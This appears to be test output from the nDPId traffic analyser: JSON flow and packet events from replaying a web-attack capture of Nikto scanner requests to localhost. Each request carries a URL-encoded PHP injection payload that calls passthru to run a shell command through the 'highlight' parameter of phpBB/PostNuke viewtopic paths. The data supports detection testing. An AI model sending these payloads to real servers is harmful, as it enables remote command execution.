00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01218{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01212{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01228{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="}
01219{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01219{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01188{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
